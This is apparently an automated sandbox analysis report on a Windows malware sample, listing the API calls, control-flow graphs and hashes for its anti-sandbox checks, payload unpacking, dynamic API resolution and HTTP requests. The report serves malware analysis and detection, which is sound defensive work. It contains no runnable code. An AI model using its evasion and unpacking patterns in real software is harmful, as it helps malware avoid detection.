                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                            • String ID: :$C$\
                                            • API String ID: 3790021787-3809124531
                                            • Opcode ID: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                            • Instruction ID: 56630df3f9a1121e358c86d43682af9e85f8bbcd47ea8763ba8f74f533c9f43c
                                            • Opcode Fuzzy Hash: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                            • Instruction Fuzzy Hash: 8541B6B1D05358DBDB10DF94CC45BDEBBB8AF48704F10009AF509A7280D7786B84CBA9

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1344 23f003c-23f0047 1345 23f004c-23f0263 call 23f0a3f call 23f0e0f call 23f0d90 VirtualAlloc 1344->1345 1346 23f0049 1344->1346 1361 23f028b-23f0292 1345->1361 1362 23f0265-23f0289 call 23f0a69 1345->1362 1346->1345 1364 23f02a1-23f02b0 1361->1364 1366 23f02ce-23f03c2 VirtualProtect call 23f0cce call 23f0ce7 1362->1366 1364->1366 1367 23f02b2-23f02cc 1364->1367 1373 23f03d1-23f03e0 1366->1373 1367->1364 1374 23f0439-23f04b8 VirtualFree 1373->1374 1375 23f03e2-23f0437 call 23f0ce7 1373->1375 1377 23f04be-23f04cd 1374->1377 1378 23f05f4-23f05fe 1374->1378 1375->1373 1380 23f04d3-23f04dd 1377->1380 1381 23f077f-23f0789 1378->1381 1382 23f0604-23f060d 1378->1382 1380->1378 1386 23f04e3-23f0505 LoadLibraryA 1380->1386 1384 23f078b-23f07a3 1381->1384 1385 23f07a6-23f07b0 1381->1385 1382->1381 1387 23f0613-23f0637 1382->1387 1384->1385 1388 23f086e-23f08be LoadLibraryA 1385->1388 1389 23f07b6-23f07cb 1385->1389 1390 23f0517-23f0520 1386->1390 1391 23f0507-23f0515 1386->1391 1392 23f063e-23f0648 1387->1392 1396 23f08c7-23f08f9 1388->1396 1393 23f07d2-23f07d5 1389->1393 1394 23f0526-23f0547 1390->1394 1391->1394 1392->1381 1395 23f064e-23f065a 1392->1395 1397 23f07d7-23f07e0 1393->1397 1398 23f0824-23f0833 1393->1398 1399 23f054d-23f0550 1394->1399 1395->1381 1400 23f0660-23f066a 1395->1400 1401 23f08fb-23f0901 1396->1401 1402 23f0902-23f091d 1396->1402 1403 23f07e4-23f0822 1397->1403 1404 23f07e2 1397->1404 1408 23f0839-23f083c 1398->1408 1405 23f0556-23f056b 1399->1405 1406 23f05e0-23f05ef 1399->1406 1407 23f067a-23f0689 1400->1407 1401->1402 1403->1393 1404->1398 1409 23f056f-23f057a 1405->1409 1410 23f056d 1405->1410 1406->1380 1411 23f068f-23f06b2 1407->1411 1412 23f0750-23f077a 1407->1412 1408->1388 1413 23f083e-23f0847 1408->1413 1419 23f057c-23f0599 1409->1419 1420 23f059b-23f05bb 1409->1420 1410->1406 1414 23f06ef-23f06fc 1411->1414 1415 23f06b4-23f06ed 1411->1415 1412->1392 1416 23f084b-23f086c 1413->1416 1417 23f0849 1413->1417 1421 23f06fe-23f0748 1414->1421 1422 23f074b 1414->1422 1415->1414 1416->1408 1417->1388 1427 23f05bd-23f05db 1419->1427 1420->1427 1421->1422 1422->1407 1427->1399
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 023F024D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID: cess$kernel32.dll
                                            • API String ID: 4275171209-1230238691
                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                            • Instruction ID: c9e143a7132afb2d700f33134137a80c5e2cb26c854c436d9f01d94a242f29a0
                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                            • Instruction Fuzzy Hash: 36526B74A01229DFDBA4CF58D984BACBBB5BF09304F1480D9E54DAB356DB30AA85CF14

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A6C0B0), ref: 00419BF1
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A6C140), ref: 00419C0A
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A6C158), ref: 00419C22
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A6C470), ref: 00419C3A
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A6C3E0), ref: 00419C53
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A66718), ref: 00419C6B
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A654C0), ref: 00419C83
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A65320), ref: 00419C9C
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A6C4D0), ref: 00419CB4
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A6C5A8), ref: 00419CCC
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A6C5D8), ref: 00419CE5
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A6C5C0), ref: 00419CFD
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A65400), ref: 00419D15
                                              • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A6C5F0), ref: 00419D2E
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                              • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
                                              • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                              • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
                                              • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
                                              • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                              • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                              • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                              • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                              • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                              • Part of subcall function 00416A10: GetUserDefaultLangID.KERNEL32(?,?,00416CC6,00420AF3), ref: 00416A14
                                            • GetUserDefaultLCID.KERNEL32 ref: 00416CC6
                                              • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                              • Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                              • Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                              • Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                              • Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                              • Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                              • Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00A6DD90,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
                                            • CloseHandle.KERNEL32(00000000), ref: 00416D99
                                            • Sleep.KERNEL32(00001770), ref: 00416DA4
                                            • CloseHandle.KERNEL32(?,00000000,?,00A6DD90,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
                                            • ExitProcess.KERNEL32 ref: 00416DC2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                            • String ID:
                                            • API String ID: 3511611419-0
                                            • Opcode ID: bf967cd6bc2304dd4ffbf75b22ae3b16d4045f6df65640dcb8cb66761ee7e8e8
                                            • Instruction ID: 27cf1f4c78a26a12fad1801110170cb785a0876a7ac7b1f74ab5ff3c6832b849
                                            • Opcode Fuzzy Hash: bf967cd6bc2304dd4ffbf75b22ae3b16d4045f6df65640dcb8cb66761ee7e8e8
                                            • Instruction Fuzzy Hash: CB315E30A05104ABCB04FBF1EC56BEE7379AF44314F50492FF11266196EF786A85C66E

                                            Control-flow Graph

                                            APIs
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                            • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ??2@$CrackInternetlstrlen
                                            • String ID: <
                                            • API String ID: 1683549937-4251816714
                                            • Opcode ID: 0d04d0fb4be0be433e1c114cda58dd540d8fffc3d57bbae13facacbf9f3574dd
                                            • Instruction ID: 160db8237089610cf3963e488d7c28046b69bb3d6c402c1973a99714a059ae02
                                            • Opcode Fuzzy Hash: 0d04d0fb4be0be433e1c114cda58dd540d8fffc3d57bbae13facacbf9f3574dd
                                            • Instruction Fuzzy Hash: 9F2149B1D00219ABDF14DFA5EC4AADD7B75FF04320F008229F925A7290EB706A19CF95

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1493 401220-401247 call 418b40 GlobalMemoryStatusEx 1496 401273-40127a 1493->1496 1497 401249-401271 call 41dd30 * 2 1493->1497 1498 401281-401285 1496->1498 1497->1498 1501 401287 1498->1501 1502 40129a-40129d 1498->1502 1504 401292-401294 ExitProcess 1501->1504 1505 401289-401290 1501->1505 1505->1502 1505->1504
                                            APIs
                                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                            • __aulldiv.LIBCMT ref: 00401258
                                            • __aulldiv.LIBCMT ref: 00401266
                                            • ExitProcess.KERNEL32 ref: 00401294
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                            • String ID: @
                                            • API String ID: 3404098578-2766056989
                                            • Opcode ID: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                            • Instruction ID: 198c605b63268064c6e3321c907f2861ebf30c0b4d659eb8408d118d522d9ff8
                                            • Opcode Fuzzy Hash: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
                                            • Instruction Fuzzy Hash: 88014BF0D44308BAEB10DFE0DD4ABAEBB78AB14705F20849EE604B62D0D6785581875D

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1507 416d93 1508 416daa 1507->1508 1510 416d5a-416d77 call 41ade0 OpenEventA 1508->1510 1511 416dac-416dc2 call 416bc0 call 415d60 CloseHandle ExitProcess 1508->1511 1516 416d95-416da4 CloseHandle Sleep 1510->1516 1517 416d79-416d91 call 41ade0 CreateEventA 1510->1517 1516->1508 1517->1511
                                            APIs
                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00A6DD90,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
                                            • CloseHandle.KERNEL32(00000000), ref: 00416D99
                                            • Sleep.KERNEL32(00001770), ref: 00416DA4
                                            • CloseHandle.KERNEL32(?,00000000,?,00A6DD90,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
                                            • ExitProcess.KERNEL32 ref: 00416DC2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                            • String ID:
                                            • API String ID: 941982115-0
                                            • Opcode ID: d5e1fa89fe7d5108738a6f3c91913c7127e375a878f495bce87c5ec22f141b40
                                            • Instruction ID: 8f12dcb365d2fb80f233d5f720f30c8ba2b1eb9bf2b810d0bdce41a90926edfe
                                            • Opcode Fuzzy Hash: d5e1fa89fe7d5108738a6f3c91913c7127e375a878f495bce87c5ec22f141b40
                                            • Instruction Fuzzy Hash: 46F08230B48219EFEB00BBA0EC0ABFE7375AF04705F15061BB516A51D0DBB89681CA5B
                                            APIs
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                              • Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,00A72600), ref: 00406353
                                              • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                              • Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,00A72080,00000000,00000000,00400100,00000000), ref: 004063D5
                                              • Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                              • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                            • String ID: ERROR$ERROR
                                            • API String ID: 3287882509-2579291623
                                            • Opcode ID: 0b85306fa1b01ee954ad4d11778b61a05f546c7aa1c90cc696e090c0594c38db
                                            • Instruction ID: 220a7b172e2a8d17d187597bbcd3bb12c7c2fc56be07e285a6b23909b802432f
                                            • Opcode Fuzzy Hash: 0b85306fa1b01ee954ad4d11778b61a05f546c7aa1c90cc696e090c0594c38db
                                            • Instruction Fuzzy Hash: 6E118630A01048ABCB14FF65EC52EED33399F50354F40456EF90A5B4A2EF38AB95C65E
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                            • GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocComputerNameProcess
                                            • String ID:
                                            • API String ID: 4203777966-0
                                            • Opcode ID: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
                                            • Instruction ID: 80df14e24d55d9e77394b8c0389cbc6422d62e125eda11eaf6ba37d1415b345b
                                            • Opcode Fuzzy Hash: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
                                            • Instruction Fuzzy Hash: D60181B1E08359ABC700CF98DD45BAFBBB8FB04751F10021BF505E2280E7B85A408BA2
                                            APIs
                                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
                                            • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
                                            • ExitProcess.KERNEL32 ref: 00401143
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$AllocCurrentExitNumaVirtual
                                            • String ID:
                                            • API String ID: 1103761159-0
                                            • Opcode ID: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
                                            • Instruction ID: f86d798d442288df0e099431c712f1cdbed5da6d4770a056b1c254158006f616
                                            • Opcode Fuzzy Hash: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
                                            • Instruction Fuzzy Hash: DCE0E670D8A30CFBE7105BA19D0AB4D77689B04B15F101156F709BA5D0D6B92640565D
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008607CE
                                            • Module32First.KERNEL32(00000000,00000224), ref: 008607EE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920917794.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_860000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                            • String ID:
                                            • API String ID: 3833638111-0
                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                            • Instruction ID: 91f075e3fe246ac63cdfe157f16941882a1f32e7eeee10cdca2aae8c13d21d85
                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                            • Instruction Fuzzy Hash: 98F0CD322003146FE7203AB9A88CB6F77E8FF49725F110528E642D10C0DAB1F8058E69
                                            APIs
                                            • SetErrorMode.KERNEL32(00000400,?,?,023F0223,?,?), ref: 023F0E19
                                            • SetErrorMode.KERNEL32(00000000,?,?,023F0223,?,?), ref: 023F0E1E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                            • Instruction ID: bbf28fa88db598cca1416b83849b6c0c41f696e2e09afd48b7263ebf89176091
                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                            • Instruction Fuzzy Hash: ABD01231545128B7D7402A94DC09BCD7B1CDF05B66F008011FB0DD9081C770954046E5
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416CBC), ref: 004010B3
                                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416CBC), ref: 004010F7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Virtual$AllocFree
                                            • String ID:
                                            • API String ID: 2087232378-0
                                            • Opcode ID: 7bfc07f09de9d23e0312477979ea6e59813f197233deaee74b0ee56a993e5f13
                                            • Instruction ID: a2dd58c0224e163af538114889642f36ecbeef109afe3d50a53e5cb7169f74e2
                                            • Opcode Fuzzy Hash: 7bfc07f09de9d23e0312477979ea6e59813f197233deaee74b0ee56a993e5f13
                                            • Instruction Fuzzy Hash: 74F0E2B1A42208BBE7149AA4AC59FAFB799E705B04F300459F540E3290D571AF00DAA4
                                            APIs
                                              • Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                              • Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                              • Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                              • Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                              • Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                              • Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                            • ExitProcess.KERNEL32 ref: 004011C6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Process$AllocName$ComputerExitUser
                                            • String ID:
                                            • API String ID: 1004333139-0
                                            • Opcode ID: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
                                            • Instruction ID: bcf4cddec8ba3652d3daa4bfa83a7295d39fc22ea0064294e7a9f420d8d9705c
                                            • Opcode Fuzzy Hash: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
                                            • Instruction Fuzzy Hash: E1E0ECB5D5820152DB1473B6AC06B5B339D5B1934EF04142FF90896252FE29F8404169
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 008604B6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1920917794.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_860000_8WOUWb5iEv.jbxd
                                            Yara matches
                                            Similarity
